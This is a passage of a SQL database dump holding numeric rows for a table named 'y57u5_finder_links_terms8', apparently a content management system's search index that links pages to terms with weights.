(178, 100887, 0.42),
(239, 100887, 0.42),
(263, 100887, 0.42),
(239, 100890, 0.37331),
(242, 100890, 0.37331),
(295, 100890, 0.37331),
(240, 100900, 0.37331),
(263, 100900, 0.37331),
(270, 100900, 0.37331),
(275, 100900, 0.37331),
(301, 100900, 0.37331),
(305, 100900, 0.37331),
(306, 100900, 0.37331),
(239, 100900, 0.74662),
(268, 100900, 1.11993),
(239, 100903, 1.00331),
(240, 100903, 1.00331),
(239, 100904, 1.16669),
(240, 100904, 1.16669),
(239, 100909, 0.37331),
(240, 100909, 0.74662),
(239, 100920, 0.81669),
(267, 100920, 0.81669),
(239, 100922, 0.18669),
(246, 100922, 0.18669),
(255, 101922, 1.09669),
(259, 101922, 1.09669),
(260, 101922, 1.09669),
(265, 101922, 1.09669),
(266, 101922, 1.09669),
(272, 101922, 1.09669),
(240, 101925, 0.88669),
(241, 101925, 0.88669),
(255, 101925, 0.88669),
(259, 101925, 0.88669),
(260, 101925, 0.88669),
(268, 101925, 0.88669),
(288, 101925, 0.88669),
(267, 101927, 0.46669),
(255, 101927, 1.40007),
(272, 101927, 6.06697),
(280, 101927, 9.40047),
(255, 101930, 2.1),
(272, 101930, 2.1),
(280, 101930, 2.1),
(240, 101954, 0.28),
(242, 101954, 0.28),
(255, 101954, 0.28),
(242, 101957, 0.46669),
(255, 101957, 0.46669),
(262, 101957, 1.86676),
(288, 101957, 2.33345),
(242, 101958, 1.05),
(255, 101958, 1.05),
(262, 101958, 4.2),
(288, 101958, 4.2),
(178, 101963, 0.81669),
(255, 101963, 0.81669),
(256, 101966, 2.15339),
(288, 101966, 2.15339),
(241, 101966, 7.22019),
(255, 101966, 7.22019),
(257, 101966, 7.22019),
(258, 101966, 7.22019),
(259, 101966, 7.22019),
(260, 101966, 7.22019),
(261, 101966, 7.22019),
(262, 101966, 7.22019),
(263, 101966, 7.22019),
(264, 101966, 7.22019),
(265, 101966, 7.22019),
(266, 101966, 7.22019),
(267, 101966, 7.22019),
(268, 101966, 7.22019),
(269, 101966, 7.22019),
(270, 101966, 7.22019),
(272, 101966, 7.22019),
(273, 101966, 7.22019),
(274, 101966, 7.22019),
(275, 101966, 7.22019),
(280, 101966, 7.22019),
(290, 101966, 7.22019),
(292, 101966, 7.22019),
(301, 101966, 7.22019),
(304, 101966, 7.22019),
(305, 101966, 7.22019),
(241, 101967, 6),
(255, 101967, 6),
(257, 101967, 6),
(258, 101967, 6),
(259, 101967, 6),
(260, 101967, 6),
(261, 101967, 6),
(262, 101967, 6),
(263, 101967, 6),
(264, 101967, 6),
(265, 101967, 6),
(266, 101967, 6),
(267, 101967, 6),
(268, 101967, 6),
(269, 101967, 6),
(270, 101967, 6),
(272, 101967, 6),
(273, 101967, 6),
(274, 101967, 6),
(275, 101967, 6),
(280, 101967, 6),
(290, 101967, 6),
(292, 101967, 6),
(301, 101967, 6),
(304, 101967, 6),
(305, 101967, 6),
(241, 101968, 2.66339),
(255, 101968, 2.66339),
(256, 101968, 2.66339),
(257, 101968, 2.66339),
(258, 101968, 2.66339),
(259, 101968, 2.66339),
(260, 101968, 2.66339),
(261, 101968, 2.66339),
(262, 101968, 2.66339),
(263, 101968, 2.66339),
(264, 101968, 2.66339),
(265, 101968, 2.66339),
(266, 101968, 2.66339),
(267, 101968, 2.66339),
(268, 101968, 2.66339),
(269, 101968, 2.66339),
(270, 101968, 2.66339),
(272, 101968, 2.66339),
(273, 101968, 2.66339),
(274, 101968, 2.66339),
(275, 101968, 2.66339),
(280, 101968, 2.66339),
(288, 101968, 2.66339),
(290, 101968, 2.66339),
(292, 101968, 2.66339),
(301, 101968, 2.66339),
(304, 101968, 2.66339),
(305, 101968, 2.66339),
(241, 102025, 0.84),
(255, 102025, 0.84),
(290, 102025, 0.84),
(305, 102025, 0.84),
(178, 102025, 2.52),
(255, 102029, 0.88669),
(261, 102029, 0.88669),
(255, 102030, 1.05),
(261, 102030, 1.05),
(240, 102032, 1.00331),
(255, 102032, 3.00993),
(255, 102037, 0.93331),
(258, 102037, 0.93331),
(178, 102040, 0.81669),
(241, 102040, 0.81669),
(255, 102040, 0.81669),
(258, 102040, 0.81669),
(299, 102040, 0.81669),
(306, 102040, 0.81669),
(255, 102041, 0.93331),
(258, 102041, 0.93331),
(255, 102047, 0.91),
(241, 102047, 1.82),
(168, 102057, 0.81669),
(174, 102057, 0.81669),
(248, 102057, 0.81669),
(255, 102057, 0.81669),
(262, 102057, 0.81669),
(267, 102057, 0.81669),
(306, 102057, 0.81669),
(248, 102180, 1.07331),
(255, 102180, 1.07331),
(174, 102184, 0.28),
(240, 102184, 0.28),
(255, 102184, 0.28),
(264, 102184, 0.28),
(265, 102184, 0.28),
(266, 102184, 0.28),
(244, 102184, 1.24),
(248, 102187, 0.37331),
(255, 102187, 0.37331),
(305, 102187, 0.74662),
(255, 102190, 0.32669),
(274, 102190, 0.32669),
(255, 102193, 0.37331),
(258, 102193, 0.37331),
(255, 102196, 0.46669),
(256, 102196, 0.46669),
(264, 102196, 0.46669),
(265, 102196, 0.46669),
(266, 102196, 0.46669),
(255, 102197, 1.05),
(265, 102197, 1.05),
(266, 102197, 1.05),
(255, 102198, 1.12),
(265, 102198, 1.12),
(266, 102198, 1.12),
(255, 102199, 0.98),
(262, 102199, 0.98),
(256, 108092, 1.12),
(257, 108092, 1.12),
(240, 108150, 0.46669),
(256, 108150, 0.46669),
(262, 108150, 0.46669),
(256, 108223, 1.02669),
(257, 108223, 1.02669),
(269, 108223, 1.02669),
(272, 108223, 2.05338),
(280, 108223, 2.05338),
(178, 110140, 0.32669),
(257, 110140, 0.32669),
(306, 110140, 0.32669),
(178, 110145, 0.95669),
(257, 110145, 0.95669),
(259, 110145, 0.95669),
(260, 110145, 0.95669),
(269, 110145, 0.95669),
(270, 110145, 0.95669),
(301, 110145, 0.95669),
(306, 110145, 0.95669),
(257, 110147, 0.46669),
(262, 110147, 0.46669),
(246, 110150, 0.95669),
(257, 110150, 0.95669),
(257, 110152, 0.46669),
(268, 110152, 0.46669),
(257, 110159, 0.86331),
(269, 110159, 0.86331),
(304, 110159, 0.86331),
(261, 110159, 1.72662),
(257, 110160, 0.95669),
(261, 110160, 0.95669),
(257, 110163, 0.88669),
(263, 110163, 0.88669),
(269, 110163, 0.88669),
(305, 110163, 0.88669),
(241, 110172, 0.88669),
(257, 110172, 0.88669),
(257, 110189, 2.66339),
(260, 110189, 2.66339),
(240, 110194, 0.88669),
(257, 110194, 1.77338),
(257, 110198, 1.07331),
(270, 110198, 1.07331),
(301, 110198, 1.07331),
(306, 110198, 1.07331),
(257, 110202, 0.88669),
(261, 110202, 0.88669),
(257, 110290, 0.91),
(265, 110290, 0.91),
(266, 110290, 0.91),
(240, 110301, 0.84),
(257, 110301, 0.84),
(267, 110301, 0.84),
(248, 110312, 0.93331),
(263, 110312, 0.93331),
(257, 110312, 1.86662),
(242, 110319, 0.88669),
(257, 110319, 0.88669),
(243, 110321, 0.18669),
(257, 110321, 0.18669),
(273, 110321, 0.18669),
(288, 110321, 0.18669),
(305, 110321, 0.18669),
(257, 110324, 0.84),
(265, 110324, 0.84),
(266, 110324, 0.84),
(243, 110435, 0.18669),
(257, 110435, 0.18669),
(240, 113494, 0.28),
(241, 113494, 0.28),
(241, 113643, 1.77338),
(306, 113643, 1.77338),
(240, 113643, 3.54676),
(241, 113646, 0.98),
(240, 113646, 1.96),
(241, 113822, 0.88669),
(243, 113822, 0.88669),
(240, 113822, 1.77338),
(241, 114229, 0.37331),
(242, 114229, 0.37331),
(246, 114229, 0.37331),
(305, 114229, 0.37331),
(240, 114229, 0.74662),
(248, 115094, 0.28),
(261, 115094, 0.28),
(263, 115094, 0.28),
(269, 115094, 0.28),
(292, 115094, 0.28),
(305, 115094, 0.28),
(242, 115094, 0.56),
(256, 115094, 0.56),
(168, 115097, 0.46669),
(256, 115097, 0.46669),
(306, 115097, 0.46669),
(246, 115197, 0.84),
(256, 115197, 0.84),
(268, 115197, 0.84),
(256, 115213, 0.93331),
(272, 115213, 0.93331),
(280, 115213, 0.93331),
(256, 115217, 0.84),
(268, 115217, 0.84),
(270, 115217, 0.84),
(301, 115217, 0.84),
(306, 115217, 0.84),
(256, 115219, 0.81669),
(259, 115219, 0.81669),
(260, 115219, 0.81669),
(256, 115232, 0.86331),
(258, 115232, 0.86331),
(242, 115416, 0.86331),
(256, 115416, 0.86331),
(267, 115416, 0.86331),
(268, 115416, 0.86331),
(256, 115418, 0.91),
(174, 115418, 3.64),
(249, 115422, 0.32669),
(256, 115422, 0.32669),
(241, 115430, 0.37331),
(249, 115430, 0.74662),
(256, 115430, 1.11993),
(264, 115430, 1.86655),
(306, 115445, 0.32669),
(244, 115445, 0.65338),
(249, 115445, 0.65338),
(274, 115445, 0.98007),
(256, 115448, 0.42),
(263, 115448, 0.42),
(241, 115448, 0.84),
(241, 116157, 0.42),
(261, 116157, 0.42),
(292, 116157, 0.42),
(242, 116157, 0.84),
(306, 116157, 1.68),
(241, 116158, 1.16669),
(242, 116158, 1.16669),
(241, 116321, 0.95669),
(242, 116321, 0.95669),
(263, 116321, 0.95669),
(240, 117414, 0.23331),
(242, 117414, 0.23331),
(240, 117457, 0.88669),
(242, 117457, 0.88669),
(269, 117457, 0.88669),
(240, 117760, 1.09669),
(242, 117760, 2.19338),
(240, 117761, 0.98),
(242, 117761, 0.98),
(258, 117761, 0.98),
(240, 117768, 0.32669),
(268, 117768, 0.32669),
(242, 117768, 0.65338),
(242, 118173, 0.32669),
(240, 118173, 0.65338),
(274, 118173, 8.21392),
(240, 118188, 0.95669),
(242, 118188, 0.95669),
(241, 145813, 0.18669),
(243, 145813, 0.18669),
(241, 145846, 0.95669),
(243, 145846, 0.95669),
(261, 145846, 0.95669),
(243, 145896, 0.91),
(241, 145896, 1.82),
(243, 145924, 0.18669),
(246, 145924, 0.18669),
(249, 145924, 0.18669),
(263, 145924, 0.18669),
(290, 145924, 0.18669),
(306, 145924, 0.18669),
(178, 145924, 0.56007),
(241, 145924, 0.74676),
(240, 147084, 0.23331),
(258, 147084, 0.23331),
(259, 147084, 0.23331),
(260, 147084, 0.23331),
(263, 147084, 0.23331),
(265, 147084, 0.23331),
(266, 147084, 0.23331),
(305, 147084, 0.23331),
(178, 147084, 0.46662),
(288, 147084, 0.79992),
(240, 147089, 0.88669),
(269, 147089, 0.88669),
(240, 147120, 1.00331),
(258, 147120, 1.00331),
(240, 147126, 1.12),
(305, 147126, 1.12),
(275, 147126, 2.24),
(240, 147133, 0.86331),
(246, 147133, 0.86331),
(304, 147133, 0.86331),
(240, 147146, 0.93331),
(265, 147146, 0.93331),
(266, 147146, 0.93331),
(265, 147225, 0.86331),
(266, 147225, 0.86331),
(240, 147225, 1.72662),
(240, 147246, 0.28),
(249, 147246, 0.28),
(265, 147246, 0.28),
(266, 147246, 0.28),
(168, 147246, 0.48),
(178, 147246, 0.48),
(272, 147246, 0.56),
(280, 147246, 0.56),
(287, 147246, 0.56),
(295, 147246, 0.56),
(174, 147246, 1.04),
(292, 147246, 1.12),
(240, 147251, 0.32669),
(246, 147251, 0.32669),
(248, 147251, 0.32669),
(240, 147403, 1.00331),
(247, 147403, 1.00331),
(240, 147411, 0.88669),
(262, 147411, 0.88669),
(305, 147411, 0.88669),
(240, 147417, 0.84),
(265, 147417, 0.84),
(266, 147417, 0.84),
(305, 147417, 0.84),
(249, 147421, 1.00331),
(240, 147421, 2.00662),
(240, 147428, 0.86331),
(265, 147428, 0.86331),
(266, 147428, 0.86331),
(274, 147428, 1.72662),
(174, 147432, 0.88669),
(240, 147432, 0.88669),
(306, 147432, 0.88669),
(248, 147439, 0.51331),
(305, 147439, 0.51331),
(240, 147439, 1.02662),
(275, 147439, 3.07986),
(240, 147464, 0.93331),
(258, 147464, 0.93331),
(259, 147464, 0.93331),
(260, 147464, 0.93331),
(263, 147464, 0.93331),
(240, 147470, 0.84),
(246, 147470, 0.84),
(292, 147470, 0.84),
(306, 147470, 0.84),
(240, 147480, 1.02669),
(274, 147480, 2.05338),
(240, 147485, 1.21331),
(265, 147485, 1.21331),
(266, 147485, 1.21331),
(240, 147489, 0.88669),
(273, 147489, 0.88669),
(304, 147797, 0.18669),
(269, 147797, 0.37338),
(240, 147797, 0.56007),
(240, 147845, 0.32669),
(306, 147845, 0.32669),
(264, 147845, 1.30676),
(242, 149390, 0.93331),
(243, 149390, 0.93331),
(274, 149390, 0.93331),
(242, 149597, 0.93331),
(258, 149597, 0.93331),
(261, 149597, 0.93331),
(264, 149597, 1.86662),
(242, 150113, 0.93331),
(272, 150113, 0.93331),
(280, 150113, 0.93331),
(288, 150113, 0.93331),
(259, 150113, 1.86662),
(260, 150113, 1.86662),
(242, 150162, 0.23331),
(243, 150162, 0.23331),
(243, 157183, 0.42),
(263, 157183, 0.42),
(174, 157190, 0.91),
(243, 157190, 0.91),
(292, 157190, 0.91),
(306, 157190, 0.91),
(243, 157197, 1.14331),
(267, 157197, 1.14331),
(275, 157197, 5.71655),
(243, 157239, 0.18669),
(259, 157239, 0.18669),
(260, 157239, 0.18669),
(243, 157248, 0.91),
(272, 157248, 0.91),
(280, 157248, 0.91),
(243, 157252, 1.00331),
(246, 157252, 1.00331),
(264, 157252, 1.00331),
(272, 157252, 1.00331),
(280, 157252, 1.00331),
(263, 157252, 3.00993),
(243, 157263, 0.46669),
(274, 157263, 0.93338),
(178, 157381, 0.91),
(243, 157381, 0.91),
(263, 157381, 0.91),
(243, 157393, 1.00331),
(275, 157393, 1.00331),
(243, 157411, 0.88669),
(259, 157411, 0.88669),
(260, 157411, 0.88669),
(261, 157411, 0.88669),
(243, 157426, 0.98),
(262, 157426, 0.98),
(243, 157435, 0.95669),
(248, 157435, 0.95669),
(263, 157435, 0.95669),
(288, 157435, 0.95669),
(305, 157435, 0.95669),
(243, 157470, 1.00331),
(247, 157470, 1.00331),
(243, 157691, 0.93331),
(268, 157691, 0.93331),
(305, 157691, 0.93331),
(241, 159113, 0.93331),
(258, 159113, 0.93331),
(174, 159140, 1.02669),
(241, 159140, 1.02669),
(241, 159147, 0.81669),
(273, 159147, 0.81669),
(241, 159192, 0.86331),
(261, 159192, 0.86331),
(241, 159226, 2.66339),
(261, 159226, 2.66339),
(267, 159305, 0.88669),
(274, 159305, 0.88669),
(241, 159305, 1.77338),
(241, 159306, 0.98),
(274, 159306, 0.98),
(241, 159313, 0.93331),
(258, 159313, 0.93331),
(241, 159358, 0.88669),
(265, 159358, 0.88669),
(266, 159358, 0.88669),
(241, 159359, 1.00331),
(265, 159359, 1.00331),
(266, 159359, 1.00331),
(241, 159377, 0.88669),
(245, 159377, 0.88669),
(304, 159377, 0.88669),
(306, 159377, 0.88669),
(258, 163173, 0.93331),
(275, 163173, 0.93331),
(258, 163193, 0.18669),
(267, 163193, 0.18669),
(268, 163200, 0.88669),
(178, 163200, 1.77338),
(258, 163200, 1.77338),
(178, 163203, 0.91),
(258, 163203, 0.91),
(168, 163207, 0.88669),
(258, 163207, 0.88669),
(264, 163207, 0.88669),
(258, 163303, 0.95669),
(259, 163303, 0.95669),
(260, 163303, 0.95669),
(267, 163303, 0.95669),
(258, 163310, 0.88669),
(263, 163310, 0.88669),
(258, 163311, 1.02669),
(263, 163311, 1.02669),
(246, 163315, 0.88669),
(258, 163315, 0.88669),
(244, 163315, 1.77338),
(242, 168699, 0.86331),
(265, 168699, 0.86331),
(266, 168699, 0.86331),
(242, 168714, 0.95669),
(267, 168714, 0.95669),
(242, 168715, 1.02669),
(267, 168715, 1.02669),
(242, 168792, 0.88669),
(268, 168792, 0.88669),
(242, 168803, 0.91),
(244, 168803, 0.91),
(246, 168803, 0.91),
(292, 168803, 0.91),
(306, 168803, 0.91),
(242, 169042, 0.32669),
(275, 169042, 0.32669),
(242, 169072, 0.95669),
(247, 169072, 0.95669),
(242, 169088, 1.07331),
(269, 169088, 1.07331),
(268, 169103, 0.93331),
(242, 169103, 1.86662),
(242, 169112, 0.88669),
(246, 169112, 0.88669),
(242, 169132, 0.23331),
(273, 169132, 0.23331),
(288, 169132, 0.23331),
(242, 169137, 0.95669),
(246, 169137, 0.95669),
(242, 169525, 0.93331),
(263, 169525, 0.93331),
(174, 169527, 0.91),
(242, 169527, 0.91),
(249, 169527, 0.91),
(242, 169546, 1.00331),
(245, 169546, 1.00331),
(242, 169548, 0.28),
(245, 169548, 0.28),
(268, 169548, 0.28),
(242, 169588, 0.42),
(244, 169588, 0.42),
(242, 169606, 0.23331),
(294, 169606, 0.23331),
(178, 169606, 0.69993),
(168, 169606, 1.16655),
(259, 173414, 0.93331),
(260, 173414, 0.93331),
(259, 173415, 1.07331),
(260, 173415, 1.07331),
(259, 173416, 0.98),
(260, 173416, 0.98),
(259, 173417, 1.09669),
(260, 173417, 1.09669),
(259, 173418, 1.07331),
(260, 173418, 1.07331),
(248, 173419, 0.32669),
(290, 173419, 0.32669),
(259, 173419, 0.65338),
(260, 173419, 0.65338),
(259, 173420, 0.95669),
(260, 173420, 0.95669),
(259, 173421, 1.05),
(260, 173421, 1.05),
(259, 173422, 0.93331),
(260, 173422, 0.93331),
(259, 173423, 1.14331),
(260, 173423, 1.14331),
(259, 173424, 1.02669),
(260, 173424, 1.02669),
(259, 173426, 0.95669),
(260, 173426, 0.95669),
(259, 173427, 1.02669),
(260, 173427, 1.02669),
(259, 173428, 1.21331),
(260, 173428, 1.21331),
(259, 173429, 1.00331),
(260, 173429, 1.00331),
(259, 173430, 1.09669),
(260, 173430, 1.09669),
(259, 173431, 0.91),
(260, 173431, 0.91),
(259, 173432, 1.02669),
(260, 173432, 1.02669),
(259, 173433, 1.05),
(260, 173433, 1.05),
(259, 173434, 1.16669),
(260, 173434, 1.16669),
(259, 173435, 0.95669),
(260, 173435, 0.95669),
(259, 173436, 1.07331),
(260, 173436, 1.07331),
(259, 173437, 1.00331),
(260, 173437, 1.00331),
(259, 173438, 1.09669),
(260, 173438, 1.09669),
(259, 173439, 2.1),
(260, 173439, 2.1),
(259, 173440, 2.28662),
(260, 173440, 2.28662),
(259, 173441, 0.93331),
(260, 173441, 0.93331),
(259, 173442, 0.93331),
(260, 173442, 0.93331),
(306, 173442, 0.93331),
(259, 173443, 1.07331),
(260, 173443, 1.07331),
(178, 173444, 0.42),
(248, 173444, 0.42),
(259, 173444, 0.42),
(260, 173444, 0.42),
(262, 173444, 0.42),
(268, 173444, 0.42),
(272, 173444, 1.26),
(280, 173444, 1.26),
(248, 173445, 0.98),
(259, 173445, 0.98),
(260, 173445, 0.98),
(272, 173445, 1.96),
(280, 173445, 1.96),
(259, 173446, 1.05),
(260, 173446, 1.05),
(259, 173447, 1.14331),
(260, 173447, 1.14331),
(259, 173448, 1.05),
(260, 173448, 1.05),
(259, 173449, 1.14331),
(260, 173449, 1.14331),
(259, 173450, 0.98),
(260, 173450, 0.98),
(259, 173451, 0.95669),
(260, 173451, 0.95669),
(259, 173452, 1.05),
(260, 173452, 1.05),
(259, 173453, 0.93331),
(260, 173453, 0.93331),
(259, 173454, 1.02669),
(260, 173454, 1.02669),
(174, 173455, 0.88669),
(259, 173455, 0.88669),
(260, 173455, 0.88669),
(306, 173455, 0.88669),
(259, 173456, 1.05),
(260, 173456, 1.05),
(259, 173457, 2.28662),
(260, 173457, 2.28662),
(272, 173458, 1.05),
(280, 173458, 1.05),
(259, 173458, 2.1),
(260, 173458, 2.1),
(259, 173468, 0.18669),
(260, 173468, 0.18669),
(304, 173468, 0.18669),
(259, 173469, 0.88669),
(260, 173469, 0.88669),
(259, 173470, 0.98),
(260, 173470, 0.98),
(259, 173471, 2.66339),
(263, 173471, 2.66339),
(304, 173471, 2.66339),
(259, 173472, 0.91),
(260, 173472, 0.91),
(259, 173473, 1.00331),
(260, 173473, 1.00331),
(259, 173474, 0.23331),
(260, 173474, 0.23331),
(259, 173475, 0.93331),
(260, 173475, 0.93331),
(259, 173476, 1.02669),
(260, 173476, 1.02669),
(259, 173477, 0.28),
(260, 173477, 0.28),
(259, 173478, 0.91),
(260, 173478, 0.91),
(259, 173479, 1.02669),
(260, 173479, 1.02669),
(259, 173480, 0.32669),
(260, 173480, 0.32669),
(259, 173481, 0.95669),
(260, 173481, 0.95669),
(259, 173482, 1.02669),
(260, 173482, 1.02669),
(259, 173483, 0.86331),
(260, 173483, 0.86331),
(272, 173483, 0.86331),
(280, 173483, 0.86331),
(259, 173484, 1.09669),
(260, 173484, 1.09669),
(272, 173484, 1.09669),
(280, 173484, 1.09669),
(259, 173485, 0.86331),
(260, 173485, 0.86331),
(259, 173486, 0.93331),
(260, 173486, 0.93331),
(259, 173487, 1.05),
(260, 173487, 1.05),
(259, 173488, 0.93331),
(260, 173488, 0.93331),
(259, 173489, 1.02669),
(260, 173489, 1.02669),
(259, 173490, 1.00331),
(260, 173490, 1.00331),
(259, 173491, 1.05),
(260, 173491, 1.05),
(259, 173492, 1.00331),
(260, 173492, 1.00331),
(259, 173493, 1.09669),
(260, 173493, 1.09669),
(259, 173494, 0.28),
(260, 173494, 0.28),
(259, 173497, 0.95669),
(260, 173497, 0.95669),
(259, 173498, 1.07331),
(260, 173498, 1.07331),
(259, 173499, 1.00331),
(260, 173499, 1.00331),
(261, 173499, 1.00331),
(259, 173559, 1.00331),
(260, 173559, 1.00331),
(259, 173560, 0.93331),
(260, 173560, 0.93331),
(259, 173561, 1.07331),
(260, 173561, 1.07331),
(259, 173562, 0.91),
(260, 173562, 0.91),
(259, 173563, 0.93331),
(260, 173563, 0.93331),
(259, 173564, 0.95669),
(260, 173564, 0.95669),
(272, 173565, 0.98),
(273, 173565, 0.98),
(280, 173565, 0.98),
(259, 173565, 1.96),
(260, 173565, 1.96),
(259, 173566, 1.02669),
(260, 173566, 1.02669),
(259, 173567, 2.1),
(260, 173567, 2.1),
(259, 173568, 0.42),
(260, 173568, 0.42),
(259, 173569, 1.12),
(260, 173569, 1.12),
(259, 173570, 1.19),
(260, 173570, 1.19),
(259, 173571, 0.37331),
(260, 173571, 0.37331),
(259, 173572, 0.95669),
(260, 173572, 0.95669),
(259, 173573, 1.09669),
(260, 173573, 1.09669),
(259, 173574, 0.93331),
(260, 173574, 0.93331),
(259, 173575, 1.14331),
(260, 173575, 1.14331),
(259, 173576, 0.95669),
(260, 173576, 0.95669),
(259, 173577, 1.09669),
(260, 173577, 1.09669),
(259, 173578, 0.98),
(260, 173578, 0.98),
(259, 173579, 1.09669),
(260, 173579, 1.09669),
(259, 173580, 0.93331),
(260, 173580, 0.93331),
(259, 173581, 0.88669),
(260, 173581, 0.88669),
(259, 173582, 0.95669),
(260, 173582, 0.95669),
(259, 173583, 0.98),
(260, 173583, 0.98),
(259, 173584, 1.05),
(260, 173584, 1.05),
(259, 173585, 1.00331),
(260, 173585, 1.00331);
INSERT INTO `y57u5_finder_links_terms8` (`link_id`, `term_id`, `weight`) VALUES
(259, 173586, 1.09669),
(260, 173586, 1.09669),
(259, 173587, 0.95669),
(260, 173587, 0.95669),
(275, 173587, 0.95669),
(292, 173587, 0.95669),
(306, 173587, 0.95669),
(259, 173588, 0.95669),
(260, 173588, 0.95669),
(272, 173588, 0.95669),
(280, 173588, 0.95669),
(259, 173589, 1.02669),
(260, 173589, 1.02669),
(259, 173590, 0.95669),
(260, 173590, 0.95669),
(259, 173591, 1.02669),
(260, 173591, 1.02669),
(259, 173592, 1.05),
(260, 173592, 1.05),
(259, 173593, 0.95669),
(260, 173593, 0.95669),
(259, 173595, 0.86331),
(260, 173595, 0.86331),
(259, 173596, 0.93331),
(260, 173596, 0.93331),
(259, 173597, 0.93331),
(260, 173597, 0.93331),
(259, 173598, 0.98),
(260, 173598, 0.98),
(272, 173598, 0.98),
(280, 173598, 0.98),
(259, 173599, 1.05),
(260, 173599, 1.05),
(272, 173599, 1.05),
(280, 173599, 1.05),
(259, 173678, 0.18669),
(260, 173678, 0.18669),
(259, 173679, 0.88669),
(260, 173679, 0.88669),
(259, 173680, 1.00331),
(260, 173680, 1.00331),
(259, 173681, 1.05),
(260, 173681, 1.05),
(259, 173682, 1.02669),
(260, 173682, 1.02669),
(259, 173683, 2.19338),
(260, 173683, 2.19338),
(259, 173684, 1.00331),
(260, 173684, 1.00331),
(275, 173684, 1.00331),
(259, 173685, 1.05),
(260, 173685, 1.05),
(259, 173686, 1.14331),
(260, 173686, 1.14331),
(259, 173687, 0.42),
(260, 173687, 0.42),
(259, 173688, 1.02669),
(260, 173688, 1.02669),
(259, 173689, 1.12),
(260, 173689, 1.12),
(259, 173690, 1.05),
(260, 173690, 1.05),
(259, 173691, 1.14331),
(260, 173691, 1.14331),
(259, 173692, 1.07331),
(260, 173692, 1.07331),
(259, 173693, 1.19),
(260, 173693, 1.19),
(259, 173694, 0.42),
(260, 173694, 0.42),
(259, 173695, 1.00331),
(260, 173695, 1.00331),
(259, 173696, 1.09669),
(260, 173696, 1.09669),
(259, 173699, 0.37331),
(260, 173699, 0.37331),
(259, 173700, 0.98),
(260, 173700, 0.98),
(259, 173701, 1.19),
(260, 173701, 1.19),
(259, 173702, 0.93331),
(260, 173702, 0.93331),
(269, 173702, 0.93331),
(274, 173702, 0.93331),
(259, 173703, 1.02669),
(260, 173703, 1.02669),
(174, 175626, 0.32669),
(261, 175626, 0.32669),
(174, 175627, 0.98),
(261, 175627, 0.98),
(261, 175644, 0.98),
(269, 175644, 0.98),
(304, 175644, 0.98),
(249, 175649, 1.02669),
(261, 175649, 1.02669),
(261, 175778, 0.86331),
(262, 175778, 0.86331),
(306, 175778, 0.86331),
(249, 175813, 1.09669),
(261, 175813, 1.09669),
(245, 175942, 0.98),
(261, 175942, 0.98),
(244, 176626, 0.23331),
(247, 176626, 0.23331),
(168, 176637, 0.84),
(244, 176637, 0.84),
(244, 176669, 1.07331),
(264, 176669, 1.07331),
(168, 176693, 0.42),
(244, 176693, 0.42),
(178, 176693, 0.84),
(274, 176693, 0.84),
(244, 176824, 1.00331),
(246, 176824, 1.00331),
(244, 176832, 0.84),
(178, 176832, 1.68),
(244, 176847, 0.81669),
(267, 176847, 0.81669),
(305, 176847, 0.81669),
(244, 176981, 0.88669),
(272, 176981, 0.88669),
(280, 176981, 0.88669),
(306, 176981, 0.88669),
(174, 176981, 1.77338),
(245, 178617, 0.37331),
(246, 178617, 0.74662),
(245, 178618, 0.95669),
(246, 178618, 0.95669),
(245, 178619, 1.07331),
(246, 178619, 1.07331),
(245, 178646, 0.93331),
(264, 178646, 0.93331),
(245, 178688, 0.42),
(248, 178688, 0.84),
(259, 183117, 1.16669),
(260, 183117, 1.16669),
(178, 185609, 0.23331),
(262, 185609, 0.46662),
(305, 185609, 0.46662),
(262, 185623, 0.93331),
(178, 185623, 1.86662),
(178, 185791, 0.23331),
(262, 185791, 0.46662),
(174, 185806, 0.91),
(262, 185806, 0.91),
(178, 185818, 0.37331),
(262, 185818, 0.37331),
(168, 185824, 0.14),
(262, 185824, 0.14),
(159, 189274, 2.4),
(159, 189275, 2.7334),
(159, 189276, 2.6),
(160, 189288, 2.4),
(160, 189289, 2.6),
(160, 189290, 2.6),
(160, 189291, 8.16981),
(160, 189292, 9.87981),
(161, 189452, 0.18669),
(161, 189453, 1.00331),
(161, 189454, 1.09669),
(161, 189455, 0.91),
(161, 189456, 1.12),
(161, 189457, 0.28),
(161, 189458, 0.98),
(161, 189459, 1.02669),
(161, 189460, 0.46669),
(161, 189461, 1.14331),
(161, 189462, 1.30669),
(161, 189463, 0.37331),
(161, 189464, 0.98),
(161, 189465, 1.09669),
(161, 189466, 0.37331),
(161, 189467, 1.02669),
(161, 189468, 1.14331),
(161, 189469, 0.32669),
(161, 189470, 1.07331),
(161, 189471, 1.26),
(161, 189490, 0.86331),
(161, 189491, 1.02669),
(161, 189492, 0.37331),
(161, 189493, 0.95669),
(161, 189494, 1.09669),
(161, 189495, 0.37331),
(161, 189496, 0.95669),
(161, 189497, 1.00331),
(161, 189498, 0.46669),
(161, 189499, 1.16669),
(161, 189500, 1.35331),
(161, 189501, 0.32669),
(161, 189502, 0.95669),
(161, 189503, 1.02669),
(161, 189504, 0.14),
(248, 189504, 0.14),
(272, 189504, 0.14),
(280, 189504, 0.14),
(161, 189505, 0.88669),
(161, 189506, 1.02669),
(161, 189507, 0.18669),
(161, 189508, 0.91),
(161, 189509, 0.98),
(161, 189510, 0.46662),
(161, 189511, 0.98),
(161, 189512, 1.05),
(161, 189513, 0.98),
(161, 189514, 1.14331),
(161, 189515, 1.00331),
(161, 189516, 0.93331),
(161, 189517, 1.21331),
(161, 189518, 1.02669),
(161, 189519, 1.23669),
(161, 189520, 1.00331),
(161, 189521, 1.16669),
(161, 189522, 0.91),
(161, 189523, 1.16669),
(161, 189524, 0.37331),
(161, 189525, 0.98),
(161, 189526, 1.09669),
(161, 189547, 0.14),
(161, 189548, 0.86331),
(161, 189549, 0.95669),
(161, 189550, 0.14),
(161, 189551, 0.86331),
(161, 189552, 1.05),
(161, 189553, 0.14),
(161, 189554, 0.95669),
(161, 189555, 1.05),
(161, 189556, 0.95669),
(161, 189557, 1.07331),
(161, 189558, 0.32669),
(161, 189559, 1.02669),
(161, 189560, 1.19),
(161, 189561, 1.49324),
(161, 189562, 0.95669),
(161, 189563, 1.12),
(161, 189564, 0.93331),
(161, 189565, 1.12),
(161, 189566, 0.98),
(161, 189567, 1.19),
(161, 189568, 1.00331),
(161, 189569, 1.26),
(161, 189570, 0.37331),
(161, 189571, 0.93331),
(161, 189572, 1.12),
(161, 189573, 0.32669),
(161, 189574, 0.98),
(161, 189575, 1.19),
(161, 189576, 1.02662),
(161, 189577, 1.09669),
(161, 189578, 1.28331),
(161, 189579, 1.07331),
(161, 189580, 1.26),
(161, 189581, 0.51331),
(161, 189582, 1.09669),
(161, 189583, 1.35331),
